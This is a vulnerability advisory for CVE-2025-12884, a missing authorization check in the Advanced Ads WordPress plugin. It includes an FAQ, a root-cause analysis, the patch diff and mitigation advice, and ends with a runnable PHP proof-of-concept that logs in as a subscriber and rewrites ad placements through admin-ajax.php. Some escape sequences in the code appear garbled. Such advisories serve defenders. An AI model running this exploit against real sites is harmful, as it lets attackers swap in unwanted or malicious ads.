What is CVE-2025-12884?

CVE-2025-12884 is a medium severity vulnerability in the Advanced Ads – Ad Manager & AdSense plugin for WordPress, affecting versions up to and including 2.0.14. It allows authenticated users with subscriber-level access or higher to bypass authorization checks and update ad placements.

How does this vulnerability work?

The vulnerability exists in the `placement_update_item()` function, which lacks proper authorization checks. This allows an authenticated user to send a POST request to update ad placements without verifying if they have the necessary permissions.

Who is affected by CVE-2025-12884?

Any WordPress site using the Advanced Ads plugin version 2.0.14 or earlier is vulnerable. This affects all authenticated users with subscriber-level permissions or higher.

How can I check if my site is vulnerable?

Check the version of the Advanced Ads plugin installed on your WordPress site. If it is version 2.0.14 or earlier, your site is vulnerable to CVE-2025-12884.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Advanced Ads plugin to version 2.0.15 or later, where the issue has been patched with proper authorization checks.

What does a CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. In practical terms, this means that while the vulnerability is significant, it does not allow for severe impacts like remote code execution or full system compromise.

What are the potential risks of this vulnerability?

If exploited, this vulnerability allows an attacker to change ad placements, which could disrupt advertising revenue and potentially display unwanted or malicious content. However, it does not grant administrative access or the ability to execute arbitrary code.

What is a proof of concept in this context?

The proof of concept demonstrates how an authenticated user can exploit the vulnerability by sending a crafted POST request to the WordPress site, effectively bypassing authorization and modifying ad placements.

What measures can I take to secure my site beyond updating?

In addition to updating the plugin, consider implementing security measures such as using strong passwords, limiting user roles, and regularly monitoring user activity to detect unauthorized changes.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the Advanced Ads plugin temporarily to prevent exploitation. Additionally, review user roles and permissions to limit access to trusted users only.

How can I stay informed about vulnerabilities like this?

Subscribe to security mailing lists, follow WordPress security blogs, and regularly check the CVE database for updates on vulnerabilities affecting WordPress plugins and themes.

Is there a way to automate plugin updates?

Yes, you can enable automatic updates for plugins in WordPress by modifying your site’s configuration or using plugins designed to manage updates, ensuring you receive security patches promptly.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-12884: Advanced Ads – Ad Manager & AdSense <= 2.0.14 – Missing Authorization to Authenticated (Subscriber+) Ad Placements Update (advanced-ads)

CVE ID CVE-2025-12884

Plugin advanced-ads

Severity Medium (CVSS 4.3)

CWE 284

Vulnerable Version 2.0.14

Patched Version 2.0.15

Disclosed February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12884:
This vulnerability is an authorization bypass in the Advanced Ads WordPress plugin, affecting versions up to and including 2.0.14. The flaw allows authenticated users with subscriber-level permissions or higher to modify ad placements, which are intended to be managed only by users with the ‘advanced_ads_manage_placements’ capability. The CVSS score of 4.3 reflects a medium severity impact on integrity.

The root cause is the missing capability check in the `placement_update_item()` function within the `/advanced-ads/includes/admin/class-ajax.php` file. Prior to the patch, the function began directly processing the `placement_id` and `item_id` parameters from the POST request. The function did not verify the user’s authorization before executing the placement update logic.

Exploitation requires an authenticated attacker with any valid WordPress user account, including the default subscriber role. The attacker sends a POST request to the `/wp-admin/admin-ajax.php` endpoint with the `action` parameter set to `advads_placement_update_item`. The request must include the `placement_id` (an integer) and `item_id` (a string identifying an ad or group) parameters. No nonce check was present, so a valid nonce is not required for the request.

The patch adds an authorization check and a nonce verification at the start of the `placement_update_item()` function. The patch inserts a call to `check_ajax_referer()` to validate the `nonce` parameter against the ‘advanced-ads-admin-ajax-nonce’ action. It then calls `Conditional::user_can(‘advanced_ads_manage_placements’)`. If either check fails, the function sends a JSON error with a 403 status code and terminates. This ensures only authorized users can proceed to the placement update logic.

Successful exploitation allows an attacker to alter which advertisement or ad group is served by a specific placement on the website. This could disrupt advertising revenue, display malicious or unintended content, or degrade site functionality. The impact is limited to the modification of existing ad placements and does not grant direct administrative access or code execution.

Differential between vulnerable and patched code

Code Diff

--- a/advanced-ads/advanced-ads.php
+++ b/advanced-ads/advanced-ads.php
@@ -10,7 +10,7 @@
  *
  * @wordpress-plugin
  * Plugin Name:       Advanced Ads
- * Version:           2.0.14
+ * Version:           2.0.15
  * Description:       Manage and optimize your ads in WordPress
  * Plugin URI:        https://wpadvancedads.com
  * Author:            Advanced Ads
@@ -37,7 +37,7 @@
 }

 define( 'ADVADS_FILE', __FILE__ );
-define( 'ADVADS_VERSION', '2.0.14' );
+define( 'ADVADS_VERSION', '2.0.15' );

 // Load the autoloader.
 require_once __DIR__ . '/includes/class-autoloader.php';
--- a/advanced-ads/includes/admin/class-ajax.php
+++ b/advanced-ads/includes/admin/class-ajax.php
@@ -954,6 +954,17 @@
 	 * @return void
 	 */
 	public function placement_update_item(): void {
+		check_ajax_referer( 'advanced-ads-admin-ajax-nonce', 'nonce' );
+
+		if ( ! Conditional::user_can( 'advanced_ads_manage_placements' ) ) {
+			wp_send_json_error(
+				[
+					'message' => __( 'Not Authorized', 'advanced-ads' ),
+				],
+				403
+			);
+		}
+
 		$placement     = wp_advads_get_placement( Params::post( 'placement_id', false, FILTER_VALIDATE_INT ) );
 		$new_item      = sanitize_text_field( Params::post( 'item_id' ) );
 		$new_item_type = 0 === strpos( $new_item, 'ad' ) ? 'ad_' : 'group_';
--- a/advanced-ads/includes/admin/class-groups-list-table.php
+++ b/advanced-ads/includes/admin/class-groups-list-table.php
@@ -164,34 +164,17 @@
 		];
 	}

-	/**
-	 * Display rows or placeholder
-	 *
-	 * @return void
-	 */
-	public function display_rows_or_placeholder(): void {
-		if ( empty( $this->items ) || ! is_array( $this->items ) ) {
-			echo '<tr class="no-items"><td class="colspanchange" colspan="' . $this->get_column_count() . '">'; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
-			$this->no_items();
-			echo '</td></tr>';
-			return;
-		}
-
-		foreach ( $this->items as $term ) {
-			$group = wp_advads_get_group( $term->term_id );
-			$this->single_row( $group );
-		}
-	}

 	/**
 	 * Render single row.
 	 *
-	 * @param Group $group Term object.
-	 * @param int   $level Depth level.
+	 * @param WP_Term|object $term  Term object.
+	 * @param int             $level Depth level.
 	 *
 	 * @return void
 	 */
-	public function single_row( $group, $level = 0 ): void {
+	public function single_row( $term, $level = 0 ): void {
+		$group = wp_advads_get_group( $term->term_id );
 		$this->type_error = '';

 		// Set the group to behave as default, if the original type is not available.
@@ -295,9 +278,9 @@
 			return '';
 		}

-		$actions = [];
+		$actions  = [];
+
 		if ( ! $this->type_error && current_user_can( $tax->cap->edit_terms ) ) {
-			// edit group link.
 			$actions['edit'] = '<a href="#modal-group-edit-' . $group->get_id() . '"
 								class="edits">' . esc_html__( 'Edit', 'advanced-ads' ) . '</a>';

@@ -310,14 +293,22 @@
 		$actions['usage'] = '<a href="#modal-group-usage-' . $group->get_id() . '" class="edits">' . esc_html__( 'Show Usage', 'advanced-ads' ) . '</a>';

 		if ( current_user_can( $tax->cap->delete_terms ) ) {
-			$args              = [
-				'action'   => 'group',
-				'action2'  => 'delete',
-				'group_id' => $group->get_id(),
-				'page'     => 'advanced-ads-groups',
-			];
-			$delete_link       = add_query_arg( $args, admin_url( 'admin.php' ) );
-			$actions['delete'] = "<a class='delete-tag' href='" . wp_nonce_url( $delete_link, 'delete-tag_' . $group->get_id() ) . "'>" . __( 'Delete', 'advanced-ads' ) . '</a>';
+			$actions['delete'] = sprintf(
+				'<a class="delete-tag" href="%s">%s</a>',
+				wp_nonce_url(
+					add_query_arg(
+						[
+							'action'   => 'group',
+							'action2'  => 'delete',
+							'group_id' => $group->get_id(),
+							'page'     => 'advanced-ads-groups',
+						],
+						admin_url( 'admin.php' )
+					),
+					'delete-tag_' . $group->get_id()
+				),
+				esc_html__( 'Delete', 'advanced-ads' )
+			);
 		}

 		$actions = apply_filters( Constants::TAXONOMY_GROUP . '_row_actions', $actions, $group );
--- a/advanced-ads/includes/ads/class-ad-repository.php
+++ b/advanced-ads/includes/ads/class-ad-repository.php
@@ -395,6 +395,7 @@
 					break;
 				case 'display_conditions':
 				case 'visitor_conditions':
+				case 'visitors':
 					$value = WordPress::sanitize_conditions( $value );
 					if (
 						'editpost' === Params::post( 'originalaction' ) &&
--- a/advanced-ads/includes/class-entities.php
+++ b/advanced-ads/includes/class-entities.php
@@ -203,7 +203,7 @@

 		$args = [
 			'public'            => false,
-			'hierarchical'      => false,
+			'hierarchical'      => true,
 			'labels'            => $labels,
 			'show_ui'           => true,
 			'show_in_nav_menus' => false,
--- a/advanced-ads/includes/class-shortcodes.php
+++ b/advanced-ads/includes/class-shortcodes.php
@@ -177,5 +177,8 @@
 		foreach ( $atts as $key => $value ) {
 			$entity->set_prop_temp( $key, $value );
 		}
+
+		// WP Security: disable PHP for shortcode renders. prevents unauthorized PHP execution.
+		$entity->set_prop_temp( 'allow_php', false );
 	}
 }
--- a/advanced-ads/includes/utilities/class-wordpress.php
+++ b/advanced-ads/includes/utilities/class-wordpress.php
@@ -267,6 +267,20 @@
 			if ( isset( $condition['type'] ) && 'paginated_post' === $condition['type'] ) {
 				continue;
 			}
+
+			// VC - IP address trim each line and drop empties.
+			if (
+				isset( $condition['type'], $condition['value'] )
+				&& 'ip_address' === $condition['type']
+				&& is_string( $condition['value'] )
+			) {
+				$condition['value'] = implode(
+					"n",
+					array_filter( array_map( 'trim', preg_split( '/r?n/', $condition['value'] ) ) )
+				);
+				$conditions[ $index ] = $condition;
+			}
+
 			if ( empty( $condition['value'] ) ) {
 				unset( $conditions[ $index ] );
 			}
--- a/advanced-ads/packages/advanced-ads/framework/src/class-updates.php
+++ b/advanced-ads/packages/advanced-ads/framework/src/class-updates.php
@@ -145,6 +145,6 @@
 			$version = $this->get_version();
 		}

-		update_option( $this->get_option_name(), $this->get_version() );
+		update_option( $this->get_option_name(), $version );
 	}
 }
--- a/advanced-ads/packages/composer/installed.php
+++ b/advanced-ads/packages/composer/installed.php
@@ -22,7 +22,7 @@
         'advanced-ads/framework' => array(
             'pretty_version' => 'dev-main',
             'version' => 'dev-main',
-            'reference' => 'bafe2c32b1530cfb18d8b738adb9524f8406b9aa',
+            'reference' => 'c6c2bfaab794daa34ddd218016328e09f8531f6e',
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../advanced-ads/framework',
             'aliases' => array(

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12884 - Advanced Ads – Ad Manager & AdSense <= 2.0.14 - Missing Authorization to Authenticated (Subscriber+) Ad Placements Update
<?php
// Configure the target WordPress site URL.
$target_url = 'http://vulnerable-site.example.com';

// WordPress credentials for a subscriber-level user.
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Initialize a cURL session for cookie persistence.
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Step 1: Authenticate to WordPress to obtain a valid session.
$login_url = $target_url . '/wp-login.php';
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
$response = curl_exec($ch);

// Step 2: Send the unauthorized placement update request.
// The AJAX endpoint is /wp-admin/admin-ajax.php.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// The action parameter triggers the vulnerable function.
$exploit_fields = [
    'action' => 'advads_placement_update_item',
    // A valid placement ID must be supplied. This would need to be discovered.
    'placement_id' => '1',
    // The new item ID to assign to the placement (e.g., an ad or group identifier).
    'item_id' => 'ad_123'
];
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_fields));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Output the result.
echo "HTTP Response Code: $http_coden";
echo "Response Body: $responsen";

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-12884?
Overview of the vulnerability
CVE-2025-12884 is a medium severity vulnerability in the Advanced Ads – Ad Manager & AdSense plugin for WordPress, affecting versions up to and including 2.0.14. It allows authenticated users with subscriber-level access or higher to bypass authorization checks and update ad placements.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability exists in the `placement_update_item()` function, which lacks proper authorization checks. This allows an authenticated user to send a POST request to update ad placements without verifying if they have the necessary permissions.
Who is affected by CVE-2025-12884?
Identifying vulnerable users and systems
Any WordPress site using the Advanced Ads plugin version 2.0.14 or earlier is vulnerable. This affects all authenticated users with subscriber-level permissions or higher.
How can I check if my site is vulnerable?
Steps to verify vulnerability
Check the version of the Advanced Ads plugin installed on your WordPress site. If it is version 2.0.14 or earlier, your site is vulnerable to CVE-2025-12884.
How can I fix this vulnerability?
Updating the plugin
To mitigate this vulnerability, update the Advanced Ads plugin to version 2.0.15 or later, where the issue has been patched with proper authorization checks.
What does a CVSS score of 4.3 mean?
Understanding the severity rating
A CVSS score of 4.3 indicates a medium severity vulnerability. In practical terms, this means that while the vulnerability is significant, it does not allow for severe impacts like remote code execution or full system compromise.
What are the potential risks of this vulnerability?
Impact on site functionality
If exploited, this vulnerability allows an attacker to change ad placements, which could disrupt advertising revenue and potentially display unwanted or malicious content. However, it does not grant administrative access or the ability to execute arbitrary code.
What is a proof of concept in this context?
Demonstrating the vulnerability
The proof of concept demonstrates how an authenticated user can exploit the vulnerability by sending a crafted POST request to the WordPress site, effectively bypassing authorization and modifying ad placements.
What measures can I take to secure my site beyond updating?
Additional security practices
In addition to updating the plugin, consider implementing security measures such as using strong passwords, limiting user roles, and regularly monitoring user activity to detect unauthorized changes.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If you cannot update the plugin immediately, consider disabling the Advanced Ads plugin temporarily to prevent exploitation. Additionally, review user roles and permissions to limit access to trusted users only.
How can I stay informed about vulnerabilities like this?
Keeping up with security updates
Subscribe to security mailing lists, follow WordPress security blogs, and regularly check the CVE database for updates on vulnerabilities affecting WordPress plugins and themes.
Is there a way to automate plugin updates?
Streamlining security maintenance
Yes, you can enable automatic updates for plugins in WordPress by modifying your site’s configuration or using plugins designed to manage updates, ensuring you receive security patches promptly.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations